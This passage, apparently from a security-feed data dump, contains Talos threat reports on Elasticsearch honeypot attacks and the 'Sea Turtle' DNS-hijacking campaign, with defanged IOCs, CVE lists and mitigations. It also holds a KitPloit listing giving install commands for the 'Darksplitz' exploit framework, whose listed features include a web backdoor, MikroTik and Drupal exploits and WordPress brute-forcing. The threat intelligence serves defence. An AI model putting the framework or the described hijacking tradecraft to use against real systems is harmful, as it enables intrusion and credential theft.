\n \n \nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nEmail Security can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. \n \nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. \n \nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \n\n\n## IOCs:\n\n \n**First Actor:** \n \n**Attacking IP addresses:** \n \n101[.]200[.]48[.]68 \n117[.]205[.]7[.]194 \n107[.]182[.]183[.]206 \n124[.]43[.]19[.]159 \n139[.]99[.]131[.]57 \n179[.]50[.]196[.]228 \n185[.]165[.]116[.]144 \n189[.]201[.]192[.]242 \n191[.]189[.]30[.]112 \n192[.]210[.]198[.]50 \n195[.]201[.]169[.]194 \n216[.]15[.]146[.]34 \n43[.]240[.]65[.]121 \n45[.]76[.]136[.]196 \n45[.]76[.]178[.]34 \n52[.]8[.]60[.]118 \n54[.]70[.]161[.]251 \n139[.]159[.]218[.]82 \n \n**IP addresses and ports hosting malware:** \n \n45[.]76[.]122[.]92:8506 \n207[.]148[.]70[.]143:8506 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 e2f1be608c2cece021e68056f2897d88ed855bafd457e07e62533db6dfdc00dc \n191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c \n2bcc9fff40053ab356ddde6de55077f8bf83d8dfa6d129c250f521eb170dc123 \n9a181c6a1748a9cfb46751a2cd2b27e3e742914873de40402b5d40f334d5448c 5fe3b0ba0680498dbf52fb8f0ffc316f3a4d7e8202b3ec710b2ae63e70c83b90 \n7b08a8dae39049aecedd9679301805583a77a4271fddbafa105fa3b1b507baa3 \n \n**Second Actor:** \n \n**Attacking 
IP address:** \n \n202[.]109[.]143[.]110 \n \n**IP address and port hosting malware:** \n \n216[.]176[.]179[.]106:9090 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 \n \n**Third Actor:** \n \n**Attacking IP addresses:** \n \n125[.]231[.]139[.]75 \n36[.]235[.]171[.]244 \n \n**IP addresses linked to QQ account, but not delivering malware:** \n \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n**IP address and port hosting malware:** \n \n104[.]203[.]170[.]198:5522 \n \n**SHA256 of malware hosted on above IP address:** \n \n7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500 e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba 709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e 830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a \n \n**Remaining actors:** \n \n**Attacking IP addresses:** \n \n111[.]19[.]78[.]4 \n15[.]231[.]235[.]194 \n221[.]203[.]81[.]226 \n111[.]73[.]45[.]90 \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n\n\n", "cvss3": {}, "published": "2019-02-26T10:56:00", "type": "talosblog", "title": "Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-1273", "CVE-2018-7600"], "modified": "2019-03-01T15:56:50", "id": "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uGLhJU8rCm8/cisco-talos-honeypot-analysis-reveals.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-04-24T16:19:06", "description": "[](<https://3.bp.blogspot.com/-ksOHISXuYNU/XLX7wzGSHNI/AAAAAAAAAgI/Ffst6mMQLNIBQP1F1gRMNCYEu2-jdZr6ACEwYBhgL/s1600/image2.jpg>)\n\n \n \n_Authors: [Danny 
Adamitis](<https://twitter.com/dadamitis>), [David Maynor](<https://twitter.com/Dave_Maynor>), [Warren Mercer](<https://twitter.com/SecurityBeard>), [Matthew Olney ](<https://twitter.com/kpyke>)and [Paul Rascagneres](<https://twitter.com/r00tbsd>)._ \n_ \n_ \n_Update 4/18: _A correction has been made to our research based on feedback from Packet Clearing House, we thank them for their assistance \n \n\n\n## Preface\n\nThis blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have on the internet. That trust and the stability of the DNS system as a whole drives the global economy. Responsible nations should avoid targeting this system, work together to establish an accepted global norm that this system and the organizations that control it are off-limits, and cooperate in pursuing those actors who act irresponsibly by targeting this system. \n \n \n\n\n## Executive Summary\n\nCisco Talos has discovered a new cyber threat campaign that we are calling \"Sea Turtle,\" which is targeting public and private entities, including national security organizations, located primarily in the Middle East and North Africa. The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019. Our investigation revealed that at least 40 different organizations across 13 different countries were compromised during this campaign. 
We assess with high confidence that this activity is being carried out by an advanced, state-sponsored actor that seeks to obtain persistent access to sensitive networks and systems. \n \nThe actors behind this campaign have focused on using DNS hijacking as a mechanism for achieving their ultimate objectives. DNS hijacking occurs when the actor can illicitly modify DNS name records to point users to actor-controlled servers. The Department of Homeland Security (DHS) issued an [alert](<https://www.us-cert.gov/ncas/alerts/AA19-024A>) about this activity on Jan. 24 2019, warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names. \n \nIn the Sea Turtle campaign, Talos was able to identify two distinct groups of victims. The first group, we identify as primary victims, includes national security organizations, ministries of foreign affairs, and prominent energy organizations. The threat actor targeted third-party entities that provide services to these primary entities to obtain access. Targets that fall into the secondary victim category include numerous DNS registrars, telecommunication companies, and internet service providers. One of the most notable aspects of this campaign was how they were able to perform DNS hijacking of their primary victims by first targeting these third-party entities. \n \nWe assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage, which we [reported](<https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html>) on in November 2018. The Sea Turtle campaign almost certainly poses a more severe threat than DNSpionage given the actor's methodology in targeting various DNS registrars and registries. The level of access we presume necessary to engage in DNS hijacking successfully indicates an ongoing, high degree of threat to organizations in the targeted regions. 
Due to the effectiveness of this approach, we encourage all organizations, globally, to ensure they have taken steps to minimize the possibility of malicious actors duplicating this attack methodology. \n \nThe threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors. The actors are responsible for the first [publicly confirmed](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) case against an organization that manages a root server zone, highlighting the attacker's sophistication. Notably, the threat actors have continued their attacks despite public reports documenting various aspects of their activity, suggesting they are unusually brazen and may be difficult to deter going forward. In most cases, threat actors typically stop or slow down their activities once their campaigns are publicly revealed. \n \nThis post provides the technical findings you would typically see in a Talos blog. We will also offer some commentary on the threat actor's tradecraft, including possible explanations about the actor's attack methodology and thought process. Finally, we will share the IOCs that we have observed thus far, although we are confident there are more that we have not seen. \n \n\n\n### Background on Domain Name Services and records management\n\nThe threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space. This section provides a brief overview of where DNS records are managed and how they are accessed to help readers better understand how these events unfolded. \n \nThe first and most direct way to access an organization's DNS records is through the registrar with the registrant's credentials. These credentials are used to log in to the DNS provider from the client-side, which is a registrar. 
If an attacker were able to compromise an organization's network administrator credentials, the attacker would be able to change that particular organization's DNS records at will. \n \nThe second way to access DNS records is through a DNS registrar, sometimes called a registrar operator. A registrar sells domain names to the public and manages DNS records on behalf of the registrant through the domain registry. Records in the domain registry are accessed through the registry application using the Extensible Provisioning Protocol (EPP). EPP was detailed in the [request for comment (RFC) 5730](<https://tools.ietf.org/html/rfc5730>) as \"a means of interaction between a registrar's applications and registry applications.\" If the attackers were able to obtain one of these EPP keys, they would be able to modify any DNS records that were managed by that particular registrar. \n \nThe third way to gain access to DNS records is through one of the registries. These registries manage any known TLD, such as entire country code top-level domains (ccTLDs) and generic top-level domains (gTLDs). For example, Verisign manages all entities associated with the top-level domain (TLD) \".com.\" All the different registry information then converges into one of [12 different](<https://www.iana.org/domains/root/servers>) organizations that manage different parts of the domain registry root. The domain registry root is stored on 13 \"named authorities in the delegation data for the root zone,\" according to [ICANN](<https://www.icann.org/news/blog/there-are-not-13-root-servers>). \n \nFinally, actors could target root zone servers to modify the records directly. It is important to note that there is no evidence during this campaign (or any other we are aware of) that the root zone servers were attacked or compromised. We highlight this only as a potential avenue that attackers might consider. 
The root DNS servers issued a [joint statement](<https://root-servers.org/news/20190314-Rootops_statement_Integrity_of_root_server_system.pdf>) that stated, \"There are no signs of lost integrity or compromise of the content of the root [server] zone\u2026There are no signs of clients having received unexpected responses from root servers.\" \n\n\n### Assessed Sea Turtle DNS hijacking methodology\n\nIt is important to remember that the DNS hijacking is merely a means for the attackers to achieve their primary objective. Based on observed behaviors, we believe the actor ultimately intended to steal credentials to gain access to networks and systems of interest. To achieve their goals, the actors behind Sea Turtle: \n\n\n 1. Established a means to control the DNS records of the target.\n 2. Modified DNS records to point legitimate users of the target to actor-controlled servers.\n 3. Captured legitimate user credentials when users interacted with these actor-controlled servers.\nThe diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals. \n \n\n\n### Redirection Attack Methodology Diagram\n\n[](<http://2.bp.blogspot.com/-FQg4Ak28yDc/XLdL-8NlekI/AAAAAAAAAXw/wDpJRiXAEGEzPJo9bQ9PxqOG8rcGn6gWACK4BGAYYCw/s1600/DNSpionage-methodology-v2.png>)\n\n \n\n\n### Operational tradecraft\n\n#### Initial access\n\nThe threat actors behind the Sea Turtle campaign gained initial access either by exploiting known vulnerabilities or by sending spear-phishing emails. Talos believes that the threat actors have exploited multiple known CVEs to either gain initial access or to move laterally within an affected organization. 
Based on our research, we know the actor utilizes the following known exploits: \n\n\n * [CVE-2009-1151](<https://nvd.nist.gov/vuln/detail/CVE-2009-1151>): PHP code injection vulnerability affecting phpMyAdmin\n * [CVE-2014-6271](<https://nvd.nist.gov/vuln/detail/CVE-2014-6271>): RCE affecting the GNU Bash shell, specifically via SMTP (this was part of the [Shellshock](<https://www.us-cert.gov/ncas/alerts/TA14-268A>) CVEs)\n * [CVE-2017-3881](<https://nvd.nist.gov/vuln/detail/CVE-2017-3881>): RCE by an unauthenticated user with elevated privileges on Cisco switches\n * [CVE-2017-6736](<https://nvd.nist.gov/vuln/detail/CVE-2017-6736>): Remote code execution (RCE) on the Cisco Integrated Services Router 2811\n * [CVE-2017-12617](<https://nvd.nist.gov/vuln/detail/CVE-2017-12617>): RCE affecting Apache web servers running Tomcat\n * [CVE-2018-0296](<https://nvd.nist.gov/vuln/detail/CVE-2018-0296>): Directory traversal allowing unauthorized access to Cisco Adaptive Security Appliances (ASAs) and firewalls\n * [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>): RCE on websites built with Drupal, aka \"Drupalgeddon\"\nAs of early 2019, the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure. On January 4, Packet Clearing House, which is not an Internet exchange point but rather an NGO that provides support to Internet exchange points and the core of the domain name system, provided confirmation of this aspect of the actors\u2019 tactics when it publicly revealed that its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar. \n \nAs with any initial access involving a sophisticated actor, we believe this list of CVEs to be incomplete. The actor in question can leverage known vulnerabilities as they encounter a new attack surface. This list only represents the observed behavior of the actor, not their complete capabilities. 
\n\n\n### Globalized DNS hijacking activity as an infection vector\n\nDuring a typical incident, the actor would modify the NS records for the targeted organization, pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries. The amount of time that the targeted DNS record was hijacked could range from a couple of minutes to a couple of days. This type of activity could give an attacker the ability to redirect any victim around the world who queried that particular domain. [Other cybersecurity firms](<https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/>) previously reported some aspects of this activity. Once the actor-controlled name server was queried for the targeted domain, it would respond with a falsified \"A\" record that provided the IP address of the actor-controlled MitM node instead of the IP address of the legitimate service. In some instances, the threat actors modified the time-to-live (TTL) value to one second. This was likely done to minimize the risk of any records remaining in the DNS cache of the victim machine. \n \nDuring 2019, we observed the following name servers being used in support of the Sea Turtle campaign: \n \n\n\n \n\n\n \n\n\nDomain\n\n| \n\nActive Timeframe \n \n---|--- \n \nns1[.]intersecdns[.]com\n\n| \n\nMarch - April 2019 \n \nns2[.]intersecdns[.]com\n\n| \n\nMarch - April 2019 \n \nns1[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n \nns2[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n \n \n\n\n \n\n\n### Credential harvesting: Man-in-the-middle servers\n\nOnce the threat actors accessed a domain's DNS records, the next step was to set up a man-in-the-middle (MitM) framework on an actor-controlled server. \n \nThe actor then built MitM servers that impersonated legitimate services to capture user credentials. Once these credentials were captured, the user would then be passed to the legitimate service. 
To evade detection, the actors performed \"certificate impersonation,\" a technique in which the attacker obtained a certificate authority-signed X.509 certificate from another provider for the same domain, imitating the one already used by the targeted organization. For example, if a DigiCert certificate protected a website, the threat actors would obtain a certificate for the same domain but from another provider, such as Let's Encrypt or Comodo. This tactic would make detecting the MitM attack more difficult, as a user's web browser would still display the expected \"SSL padlock\" in the URL bar. \n \nWhen the victim entered their password into the attacker's spoofed webpage, the actor would capture these credentials for future use. The only indication a victim received was a brief lag between when the user entered their information and when they obtained access to the service. This would also leave almost no evidence for network defenders to discover, as legitimate network credentials were used to access the accounts. \n \nIn addition to the MitM server IP addresses published in previous reports, Talos identified 16 additional servers leveraged by the actor during the observed attacks. The complete list of known malicious IP addresses is in the Indicators of Compromise (IOC) section below. \n\n\n### Credential harvesting with compromised SSL certificates\n\nOnce the threat actors appeared to have access to the network, they stole the organization's SSL certificate. The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials. This allowed the actors to expand their access into the targeted organization's network. The stolen certificates were typically used for less than one day, likely as an operational security measure. Using stolen certificates for an extended period would increase the likelihood of detection. 
In some cases, the victims were redirected to these actor-controlled servers displaying the stolen certificate. \n \nOne notable aspect of the campaign was the actors' ability to impersonate VPN applications, such as Cisco Adaptive Security Appliance (ASA) products, to perform MitM attacks. At this time, we do not believe that the attackers found a new ASA exploit. Rather, they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network. This MitM capability would allow the threat actors to harvest additional VPN credentials. \n \nAs an example, DNS records indicate that a targeted domain resolved to an actor-controlled MitM server. The following day, Talos identified an SSL certificate with the subject common name of \"ASA Temporary Self Signed Certificate\" associated with the aforementioned IP address. This certificate was observed on both the actor-controlled IP address and on an IP address correlated with the victim organization. \n \nIn another case, the attackers were able to compromise NetNod, a non-profit, independent internet infrastructure organization based in Sweden. NetNod acknowledged the compromise in a [public statement](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) on February 5, 2019. Using this access, the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net. This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa). It is likely that there are additional Saudi Arabia-based victims from this attack. \n \nIn one of the more recent campaigns on March 27, 2019, the threat actors targeted the Sweden-based consulting firm Cafax. On Cafax's [public webpage](<http://www.cafax.se/Home.html>), the company states that one of their consultants actively manages the i[.]root-server[.]net zone. 
NetNod managed this particular DNS server zone. We assess with high confidence that this organization was targeted in an attempt to re-establish access to the NetNod network, which was previously compromised by this threat actor. \n\n\n### Primary and secondary victims\n\n[](<https://4.bp.blogspot.com/-NQC457__bD8/XLX7w7QGGOI/AAAAAAAAAgA/3nx4TTK6U1oHms5gRhGQRaw6TGmTo1H-ACEwYBhgL/s1600/image1.jpg>)\n\n \n \nWe identified 40 different organizations that have been targeted during this campaign. The victim organizations appear to fall broadly into two categories. The first group of victims, which we refer to as primary victims, was almost entirely located in the Middle East and North Africa. Some examples of organizations that were compromised include: \n\n\n * Ministries of foreign affairs\n * Military organizations\n * Intelligence agencies\n * Prominent energy organizations\nThe second cluster of victim organizations was likely compromised to help enable access to these primary targets. These organizations were located around the world; however, they were mostly concentrated in the Middle East and North Africa. Some examples of organizations that were compromised include: \n\n\n * Telecommunications organizations\n * Internet service providers\n * Information technology firms\n * Registrars\n * One registry\n \nNotably, the threat actors were able to gain access to registrars that manage ccTLDs for Amnic, which is listed as the technical contact on [IANA](<https://www.iana.org/domains/root/db/am.html>) for the ccTLD .am. Obtaining access to these ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs. \n\n\n### How is this tradecraft different?\n\nThe threat actors behind the Sea Turtle campaign have proven to be highly capable, as they have been able to perform operations for over two years and have been undeterred by public reports documenting various aspects of their activity. 
This cyber threat campaign represents the first known case of a domain name registry organization being compromised for cyber espionage operations. \n \nIn order to distinguish this activity from previous reporting on other attackers, such as those affiliated with DNSpionage, below is a list of traits that are unique to the threat actors behind the Sea Turtle campaign: \n\n\n * These actors perform DNS hijacking through the use of actor-controlled name servers.\n * These actors have been more aggressive in their pursuit, targeting DNS registries and a number of registrars, including those that manage ccTLDs.\n * These actors use Let's Encrypt, Comodo, Sectigo, and self-signed certificates on their MitM servers to gain the initial round of credentials.\n * Once they have access to the network, they steal the organization's legitimate SSL certificate and use it on actor-controlled servers.\n\n### Why was it so successful?\n\nWe believe that the Sea Turtle campaign continues to be highly successful for several reasons. First, the actors employ a unique approach to gain access to the targeted networks. Most traditional security products such as IDS and IPS systems are not designed to monitor and log DNS requests. The threat actors were able to achieve this level of success because security was added to the domain name system as an afterthought. Had more ccTLDs implemented security features such as registrar locks, attackers would have been unable to redirect the targeted domains. \n \nThe threat actors also used an interesting technique called certificate impersonation. This technique was successful in part because the SSL certificates were created to provide confidentiality, not integrity. The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials, allowing the actors to gain access to the targeted network. 
\n \nThe threat actors were able to maintain long-term, persistent access to many of these networks by utilizing compromised credentials. \n \nWe will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve, to ensure that our customers remain protected and the public is informed. \n \n\n\n### Mitigation strategy\n\nIn order to best protect against this type of attack, we compiled a list of potential actions. Talos suggests using a registry lock service, which will require an out-of-band message before any changes can occur to an organization's DNS records. If your registrar does not offer a registry lock service, we recommend implementing multi-factor authentication, such as [DUO](<https://www.cisco.com/c/en/us/products/security/adaptive-multi-factor-authentication.html>), to access your organization's DNS records. If you suspect you were targeted by this type of intrusion, we recommend instituting a network-wide password reset, preferably from a computer on a trusted network. Lastly, we recommend applying patches, especially on internet-facing machines. Network administrators can also monitor passive DNS records for their domains to check for abnormalities. 
\n \n\n\n### Coverage\n\nCVE-2009-1151: PHP code injection vulnerability affecting phpMyAdmin \nSID: [2281](<https://snort.org/rule_docs/1-2281>) \n \nCVE-2014-6271: RCE affecting GNU bash system, specific the SMTP (this was part of the Shellshock CVEs) \nSID: [31975](<https://snort.org/rule_docs/1-31975>) \\- [31978](<https://snort.org/rule_docs/1-31978>), [31985](<https://snort.org/rule_docs/1-31985>), [32038](<https://snort.org/rule_docs/1-32038>), [32039](<https://snort.org/rule_docs/1-32039>), [32041](<https://snort.org/rule_docs/1-32041>) \\- [32043](<https://snort.org/rule_docs/1-32043>), [32069](<https://snort.org/rule_docs/1-32069>), [32335](<https://snort.org/rule_docs/1-32335>), [32336](<https://snort.org/rule_docs/1-32336>) \n \nCVE-2017-3881: RCE for Cisco switches \nSID: [41909](<https://snort.org/rule_docs/1-41909>) \\- [41910](<https://snort.org/rule_docs/1-41910>) \n \nCVE-2017-6736: Remote Code Exploit (RCE) for Cisco integrated Service Router 2811 \nSID: [43424](<https://snort.org/rule_docs/3-43424>) \\- [43432](<https://snort.org/rule_docs/3-43432>) \n \nCVE-2017-12617: RCE affecting Apache web servers running Tomcat \nSID: [44531](<https://snort.org/rule_docs/1-44531>) \n \nCVE-2018-0296: Directory traversal to gain unauthorized access to Cisco Adaptive Security Appliances (ASAs) and Firewalls \nSID: 46897 \n \nCVE-2018-7600: RCE for Website built with Drupal aka \"Drupalgeddon\" \nSID: [46316](<https://snort.org/rule_docs/1-46316>) \n\n\n### Indicators of Compromise\n\nThe threat actors utilized leased IP addresses from organizations that offer virtual private server (VPS) services. These VPS providers have since resold many of these IP addresses to various benign customers. To help network defenders, we have included the IP address, as well as the month(s) that the IP address was associated with the threat actor. 
\n \n** \n** \n\n\n**IP address**\n\n| \n\n**Month**\n\n| \n\n**Year**\n\n| \n\n**Country of targets** \n \n---|---|---|--- \n \n199.247.3.191\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania, Iraq \n \n37.139.11.155\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania, UAE \n \n185.15.247.140\n\n| \n\nJanuary\n\n| \n\n2018\n\n| \n\nAlbania \n \n206.221.184.133\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nEgypt \n \n188.166.119.57\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nEgypt \n \n185.42.137.89\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania \n \n82.196.8.43\n\n| \n\nOctober\n\n| \n\n2018\n\n| \n\nIraq \n \n159.89.101.204\n\n| \n\nDecember - January\n\n| \n\n2018-2019\n\n| \n\nTurkey, Sweden, Syria, Armenia, US \n \n146.185.145.202\n\n| \n\nMarch\n\n| \n\n2018\n\n| \n\nArmenia \n \n178.62.218.244\n\n| \n\nDecember - January\n\n| \n\n2018-2019\n\n| \n\nUAE, Cyprus \n \n139.162.144.139\n\n| \n\nDecember \n\n| \n\n2018\n\n| \n\nJordan \n \n142.54.179.69\n\n| \n\nJanuary - February \n\n| \n\n2017\n\n| \n\nJordan \n \n193.37.213.61\n\n| \n\nDecember\n\n| \n\n2018\n\n| \n\nCyprus \n \n108.61.123.149\n\n| \n\nFebruary\n\n| \n\n2019\n\n| \n\nCyprus \n \n212.32.235.160\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n198.211.120.186\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n146.185.143.158\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n146.185.133.141\n\n| \n\nOctober\n\n| \n\n2018\n\n| \n\nLibya \n \n185.203.116.116\n\n| \n\nMay\n\n| \n\n2018\n\n| \n\nUAE \n \n95.179.150.92\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nUAE \n \n174.138.0.113\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nUAE \n \n128.199.50.175\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nUAE \n \n139.59.134.216\n\n| \n\nJuly - December\n\n| \n\n2018\n\n| \n\nUnited States, Lebanon \n \n45.77.137.65\n\n| \n\nMarch - April\n\n| \n\n2019\n\n| \n\nSyria, Sweden \n \n142.54.164.189\n\n| \n\nMarch - April\n\n| \n\n2019\n\n| \n\nSyria \n \n199.247.17.221\n\n| \n\nMarch \n\n| \n\n2019\n\n| \n\nSweden \n \n** \n** 
\n\n\nThe following list contains the threat actor name server domains and their IP address.\n\n \n\n\nDomain\n\n| \n\nActive Timeframe\n\n| \n\nIP address \n \n---|---|--- \n \nns1[.]intersecdns[.]com\n\n| \n\nMarch - April 2019\n\n| \n\n95.179.150.101 \n \nns2[.]intersecdns[.]com\n\n| \n\nMarch - April 2019\n\n| \n\n95.179.150.101 \n \nns1[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n\n| \n\n95.179.150.101 \n \nns2[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n\n| \n\n95.179.150.101 \n \n", "cvss3": {}, "published": "2019-04-18T16:08:25", "type": "talosblog", "title": "DNS Hijacking Abuses Trust In Core Internet Service", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2009-1151", "CVE-2014-6271", "CVE-2017-12617", "CVE-2017-3881", "CVE-2017-6736", "CVE-2018-0296", "CVE-2018-7600"], "modified": "2019-04-18T16:08:25", "id": "TALOSBLOG:A09C50A444F2D7D6A5D4552C85316387", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/GSxJP9GzlhI/seaturtle.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2022-04-07T12:04:01", "description": "[](<https://2.bp.blogspot.com/-WrSl3k8acz8/XKK-mOdvWPI/AAAAAAAAOaA/AhYa9ilCzBkxcfAhNbVH3l5YsgRSvL6tgCLcBGAs/s1600/Darksplitz.png>)\n\n \nThis tools is continued from Nefix, DirsPy and Xmasspy project. \n \n**Installation** \nWill work fine in the [debian](<https://www.kitploit.com/search/label/Debian> \"debian\" ) shade operating system, like Backbox, Ubuntu or Kali linux. \n\n\n 1. `$ git clone https://github.com/koboi137/darksplitz`\n 2. `$ cd darksplitz/`\n 3. 
`$ sudo ./install.sh`\n \n**Features** \n\n\n * Extract [mikrotik](<https://www.kitploit.com/search/label/MikroTik> \"mikrotik\" ) credential (user.dat)\n * Password generator\n * Reverse IP lookup\n * Mac address sniffer\n * Online md5 cracker\n * Mac address lookup\n * Collecting url from web.archive.org\n * Web [backdoor](<https://www.kitploit.com/search/label/Backdoor> \"backdoor\" ) (Dark Shell)\n * Winbox exploit (CVE-2018-14847)\n * ChimeyRed exploit for mipsbe (Mikrotik)\n * Exploit web application\n * Mass apple dos (CVE-2018-4407)\n * Libssh exploit (CVE-2018-10933)\n * Discovering Mikrotik device\n * Directory scanner\n * Subdomain scanner\n * Mac address scanner\n * Mac address pinger\n * Vhost [scanner](<https://www.kitploit.com/search/label/Scanner> \"scanner\" ) (bypass cloudflare)\n * Mass [bruteforce](<https://www.kitploit.com/search/label/Bruteforce> \"bruteforce\" ) (wordpress)\n * Interactive msfrpc client\n \n**Exploit web application** \n\n\n * plUpload file upload\n * jQuery file upload (CVE-2018-9206)\n * Laravel (.env)\n * sftp-config.json (misc)\n * Wordpress register (enable)\n * elfinder file upload\n * Drupal 7 exploit (CVE-2018-7600)\n * Drupal 8 exploit (CVE-2018-7600)\n * com_fabrik exploit (joomla)\n * gravityform plugin file upload (wordpress)\n * geoplace3 plugin file upload (wordpress)\n * peugeot-music plugin file upload (wordpress)\n \n**Notes** \nThis tool will work fine under root, because scapy module and other need root user to access more features. But you can run as user too in some features. 
;) \n \n \n\n\n**[Download Darksplitz](<https://github.com/koboi137/darksplitz> \"Download Darksplitz\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-04T21:12:00", "type": "kitploit", "title": "Darksplitz - Exploit Framework", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10933", "CVE-2018-14847", "CVE-2018-4407", "CVE-2018-7600", "CVE-2018-9206"], "modified": "2019-04-04T21:12:09", "id": "KITPLOIT:5494076556436489947", "href": "http://www.kitploit.com/2019/04/darksplitz-exploit-framework.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-07T12:04:21", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. 
